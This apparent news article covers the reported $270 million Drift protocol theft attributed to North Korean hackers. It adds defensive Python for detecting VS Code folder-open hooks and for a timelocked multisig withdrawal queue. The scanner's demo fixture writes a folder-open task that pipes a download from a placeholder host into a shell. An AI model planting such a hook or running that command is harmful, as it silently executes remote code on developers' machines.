North Korean Hackers Stole $270M From Drift by Posing as a Trading Firm for 6 Months

It reads like a spy thriller. A North Korean intelligence group spent six months posing as a legitimate quantitative trading firm, attending crypto conferences, holding technical meetings, depositing over $1 million of their own capital, and building trust with the team behind Solana-based DeFi protocol Drift. Then, on April 1, they drained $270 million from the protocol’s vaults in under a minute.

Drift’s post-mortem reveals one of the most sophisticated social engineering attacks in crypto history — and a terrifying reminder that the biggest security threats aren’t in the code. They’re in the people.

The Six-Month Infiltration

Here’s how the operation unfolded, according to Drift’s disclosure and blockchain intelligence firm Elliptic:

Timeline            Event
Fall 2025           First contact at a major crypto conference. Attackers posed as a quant trading firm seeking to integrate with Drift.
Oct–Nov 2025        Months of substantive conversations via Telegram about trading strategies and vault integrations. Technically fluent, backgrounds that checked out.
Dec 2025–Jan 2026   Onboarded an Ecosystem Vault on Drift. Multiple working sessions with contributors. Deposited $1M+ of their own capital.
Feb–Mar 2026        Exploited a VSCode/Cursor vulnerability to compromise developer devices. Simply opening a file silently executed arbitrary code.
Late March 2026     Obtained the two multisig approvals needed for the attack. Pre-signed transactions sat dormant for over a week.
April 1, 2026       Executed the attack. $270M drained in under one minute from protocol vaults.

How They Got In: The VSCode/Cursor Vulnerability

The technical attack vector is particularly alarming for the developer community. Drift pointed to a known vulnerability in VSCode and Cursor — two of the most widely used code editors in software development — that the security community had been flagging since late 2025.

The vulnerability: simply opening a file or folder in the editor was sufficient to silently execute arbitrary code. No clicks required. No warnings displayed. Once developer devices were compromised, the attackers had access to the private keys needed to obtain the two multisig approvals that enabled the attack.

This isn’t a smart contract exploit or a DeFi protocol bug. It is closer to a supply-chain attack than to a protocol exploit: the way in was the developer’s own tools, and the protocol itself never had to be broken.
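The check a practitioner would want at this point is something to run on a counterparty’s repository before opening it in an editor at all. The script below is an added example, not Drift’s tooling and not a reproduction of the flaw Drift pointed to (the page gives no identifier for it). It audits two documented VS Code auto-execution mechanisms that a “strategy” repo could carry: tasks.json entries with runOptions.runOn set to "folderOpen", which run as soon as the folder is opened, and settings.json keys that point the editor at an executable or alter the integrated terminal’s environment. The sample workspace it builds is constructed for the demo; the setting names are real VS Code settings. It deliberately ignores Workspace Trust, because a folder trusted out of habit gets no protection from it.

```python
"""Pre-open audit of a checked-out folder for editor auto-execution hooks.

Added example, not Drift's code. Scans the VS Code config files an editor
acts on automatically and reports anything that would run or alter the
environment when the folder is opened.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Real VS Code setting names that name a binary to run or change the shell
# environment. Any of them inside a repo you did not write deserves a look.
RISKY_SETTING_KEYS = frozenset({
    "git.path",
    "python.defaultInterpreterPath",
    "typescript.tsdk",
    "eslint.nodePath",
    "terminal.integrated.env.linux",
    "terminal.integrated.env.osx",
    "terminal.integrated.env.windows",
    "terminal.integrated.profiles.linux",
    "terminal.integrated.profiles.osx",
    "terminal.integrated.profiles.windows",
})


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas without ever touching
    the inside of a string, so "https://..." values survive intact."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):        # line comment: skip to newline
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):        # block comment: skip to close
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_jsonc(text: str) -> Optional[dict]:
    """VS Code config files are JSON with comments; None if unparseable."""
    try:
        data = json.loads(strip_jsonc(text))
    except json.JSONDecodeError:
        return None
    return data if isinstance(data, dict) else None


def _finding(rel: str, reason: str, detail: str) -> Dict[str, str]:
    return {"file": rel, "reason": reason, "detail": detail}


def check_config(rel: str, data: dict, findings: List[Dict[str, str]]) -> None:
    """tasks.json carries 'tasks' at top level; a .code-workspace file nests
    'tasks' and 'settings'; settings.json is the settings object itself."""
    tasks = data.get("tasks")
    if isinstance(tasks, dict):                     # .code-workspace shape
        tasks = tasks.get("tasks")
    for task in tasks or []:
        if not isinstance(task, dict):
            continue
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] +
                           [str(a) for a in task.get("args", [])]).strip()
            findings.append(_finding(rel, "task auto-runs when the folder is opened", cmd))
    settings = data.get("settings") if "settings" in data else data
    if not isinstance(settings, dict):
        settings = {}
    for key in sorted(RISKY_SETTING_KEYS & set(settings)):
        findings.append(_finding(rel, "setting names an executable or alters the shell environment",
                                 f"{key} = {settings[key]!r}"))


def scan_workspace(root: str) -> List[Dict[str, str]]:
    """Return findings for every editor config file under root."""
    base = Path(root)
    candidates = [base / ".vscode" / "tasks.json", base / ".vscode" / "settings.json"]
    candidates += sorted(base.rglob("*.code-workspace"))
    findings: List[Dict[str, str]] = []
    for path in candidates:
        if not path.is_file():
            continue
        rel = path.relative_to(base).as_posix()
        data = parse_jsonc(path.read_text(encoding="utf-8", errors="replace"))
        if data is None:                            # a broken config is itself a finding
            findings.append(_finding(rel, "unparseable config; inspect by hand", ""))
            continue
        check_config(rel, data, findings)
    return findings


def build_sample_workspace(root: str) -> None:
    """Constructed sample: a 'strategy' repo with a folder-open task and a
    settings file that quietly points the editor at a bundled interpreter."""
    vscode = Path(root) / ".vscode"
    vscode.mkdir(parents=True, exist_ok=True)
    (vscode / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "prepare env", "type": "shell",
                   "command": "curl -s https://example.invalid/setup.sh | sh",
                   "runOptions": {"runOn": "folderOpen"}}],
    }))
    (vscode / "settings.json").write_text(
        '{\n  // looks like a harmless interpreter hint\n'
        '  "python.defaultInterpreterPath": "./tools/python",\n}')
    (Path(root) / "strategy.py").write_text("print('backtest')\n")


def demo() -> List[Dict[str, str]]:
    """Build the sample in a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_workspace(tmp)
        return scan_workspace(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: {f['reason']} [{f['detail']}]")
```

Run it against the cloned folder, not from inside the editor, and treat any finding as a reason to open the repo only in a throwaway VM. Note that this covers configuration-driven hooks only; the editor bug Drift described needed no such configuration, which is why lesson 2 below (do not open untrusted files at all) still applies.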

Who Did It?

Blockchain intelligence firms Elliptic and TRM Labs attributed the attack to UNC4736, a North Korean state-affiliated group also tracked as:

  • AppleJeus (by Mandiant/Google)
  • Citrine Sleet (by Microsoft)

North Korean hackers have stolen an estimated $6+ billion in cryptocurrency since 2017, funding the country’s nuclear weapons and missile programs. The Drift exploit is believed to be one of the largest single thefts in 2026.

What Makes This Attack Different

Most crypto hacks exploit code vulnerabilities — a bug in a smart contract, a flash loan attack, a bridge exploit. The Drift attack was different because it was fundamentally a human intelligence operation:

  • In-person meetings at crypto conferences (not just online)
  • Professional backgrounds that held up to checking (likely fabricated or stolen identities)
  • $1M+ capital deposit to establish credibility (an investment in the operation)
  • 6 months of relationship building before any technical exploitation
  • Developer tool exploitation rather than protocol code exploitation

This was espionage first and hacking second. The protocol code was sound; the people, and the machines they worked on, were compromised.

Lessons for the Crypto and Dev Community

  1. Update your code editors. The VSCode/Cursor vulnerability has been patched; make sure you are running a build that includes the fix, and remember that forks such as Cursor pick up upstream VS Code fixes on their own schedule.
  2. Never open untrusted files in your IDE. Treat code files from external parties like executable attachments, and open them, if at all, in a disposable VM with no keys on it.
  3. Verify identities beyond LinkedIn, and assume even that can fail. The attackers’ profiles, video calls and conference appearances all held up; identity checks are one control among several, not the control.
  4. Multisig isn’t magic. If enough of the people holding the keys are compromised, the signature threshold no longer matters. It only helps if the keys live on separate machines with separate exposure to untrusted code, so that one compromised workstation cannot yield two approvals.
  5. Time delays on large transactions. The pre-signed transactions sat dormant for over a week. A delay on large withdrawals that starts when the transaction is submitted, with a window in which any uncompromised signer can cancel it, could have caught this; a delay counted from the signing time would not, because the attackers had already waited it out.
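Lessons 4 and 5 describe a control that is easy to state and easy to get subtly wrong, so here is the policy written out as a runnable model. This is an added example, not Drift’s code and not a Solana program: signer names stand in for public keys, timestamps are plain seconds, and the amounts and the one-week gap in the scenario are constructed to mirror the timeline above. The model shows three things the list only asserts: approvals older than a policy-defined age are refused, a large withdrawal cannot move for a delay counted from submission rather than from signing, and any single authorised signer can veto it inside that window. Threshold, delay and approval age are assumed policy values, not Drift’s.

```python
"""Added example: a timelocked, vetoable withdrawal queue (simplified model).

Not Drift's code and not a Solana program. Signatures are stand-in signer
names rather than real cryptography; the subject is the policy, not the scheme.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional

DAY = 86_400


@dataclass(frozen=True)
class Policy:
    signers: FrozenSet[str]   # authorised key holders (stand-ins for public keys)
    threshold: int            # approvals needed before a withdrawal can be submitted
    large_amount: int         # anything above this waits out the delay
    delay: int                # seconds from submission to earliest execution
    approval_max_age: int     # approvals produced longer ago than this are refused


@dataclass
class Withdrawal:
    wid: int
    amount: int
    to: str
    approvals: Dict[str, int]              # signer -> time the approval was produced
    submitted_at: Optional[int] = None     # (a dict, so at most one approval per signer)
    executable_at: Optional[int] = None
    vetoed_by: Optional[str] = None
    executed: bool = False


class Treasury:
    def __init__(self, policy: Policy, balance: int) -> None:
        self.policy = policy
        self.balance = balance
        self.queue: Dict[int, Withdrawal] = {}   # everything ever submitted

    def submit(self, w: Withdrawal, now: int) -> str:
        p = self.policy
        unknown = sorted(set(w.approvals) - p.signers)
        if unknown:
            return f"rejected: unknown signer {unknown[0]}"
        stale = sorted(s for s, t in w.approvals.items() if now - t > p.approval_max_age)
        if stale:
            return f"rejected: stale approval from {stale[0]}"
        if len(w.approvals) < p.threshold:
            return f"rejected: {len(w.approvals)} of {p.threshold} approvals"
        w.submitted_at = now
        self.queue[w.wid] = w
        if w.amount <= p.large_amount:          # routine size: pay at once
            return self._pay(w)
        # The clock starts at submission, not at signing, so approvals
        # collected a week earlier still have to sit in public view.
        w.executable_at = now + p.delay
        return f"queued: executable at {w.executable_at}"

    def veto(self, wid: int, by: str) -> str:
        """Any single authorised signer can cancel a pending large withdrawal."""
        if by not in self.policy.signers:
            return "veto rejected: not a signer"
        w = self.queue.get(wid)
        if w is None or w.executed or w.vetoed_by:
            return "veto rejected: nothing pending"
        w.vetoed_by = by
        return f"vetoed by {by}"

    def execute(self, wid: int, now: int) -> str:
        w = self.queue.get(wid)
        if w is None:
            return "rejected: unknown withdrawal"
        if w.vetoed_by:
            return f"rejected: vetoed by {w.vetoed_by}"
        if w.executed:
            return "rejected: already executed"
        if w.executable_at is not None and now < w.executable_at:
            return f"pending: {w.executable_at - now}s remaining"
        return self._pay(w)

    def _pay(self, w: Withdrawal) -> str:
        if w.amount > self.balance:
            return "rejected: insufficient balance"
        self.balance -= w.amount
        w.executed = True
        return f"executed: {w.amount} to {w.to}"


def demo() -> List[str]:
    """Constructed scenario: 2-of-3 signers, 24h delay above 1M, approvals expire after 24h."""
    policy = Policy(signers=frozenset({"alice", "bob", "carol"}), threshold=2,
                    large_amount=1_000_000, delay=DAY, approval_max_age=DAY)
    t = Treasury(policy, balance=300_000_000)
    log: List[str] = []
    # Approvals harvested from two compromised workstations at t=0, held a week.
    old = Withdrawal(1, 270_000_000, "attacker", {"alice": 0, "bob": 0})
    log.append(t.submit(old, now=8 * DAY))                    # stale: refused
    # Even fresh approvals only get a large withdrawal into the queue.
    fresh = Withdrawal(2, 270_000_000, "attacker", {"alice": 8 * DAY, "bob": 8 * DAY})
    log.append(t.submit(fresh, now=8 * DAY))                  # queued for 24h
    log.append(t.execute(2, now=8 * DAY + 3600))              # still pending
    log.append(t.veto(2, by="carol"))                         # the third signer cancels
    log.append(t.execute(2, now=9 * DAY + 1))                 # refused after the delay
    # Routine activity is unaffected.
    small = Withdrawal(3, 500, "market-maker", {"alice": 8 * DAY, "carol": 8 * DAY})
    log.append(t.submit(small, now=8 * DAY))
    return log


if __name__ == "__main__":
    print("\n".join(demo()))
```

Two caveats the model makes visible. The veto only works because carol’s key was not on the same compromised machines as alice’s and bob’s, which is lesson 4 again. And the delay buys nothing unless someone is watching the queue: pair it with an alert on every queued large withdrawal, routed to the signers who did not approve it.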

Frequently Asked Questions

How much was stolen in the Drift Protocol hack?

Reported figures range from roughly $270 million to $285 million, drained from Drift Protocol’s vaults on April 1, 2026, in under one minute. The attack was attributed to UNC4736, a North Korean state-affiliated hacking group.

How did North Korean hackers infiltrate Drift?

The attackers posed as a quant trading firm for six months, attending crypto conferences, holding technical meetings, depositing over $1 million, and building trust. They then exploited a VSCode/Cursor vulnerability to compromise developer devices and obtain multisig private keys.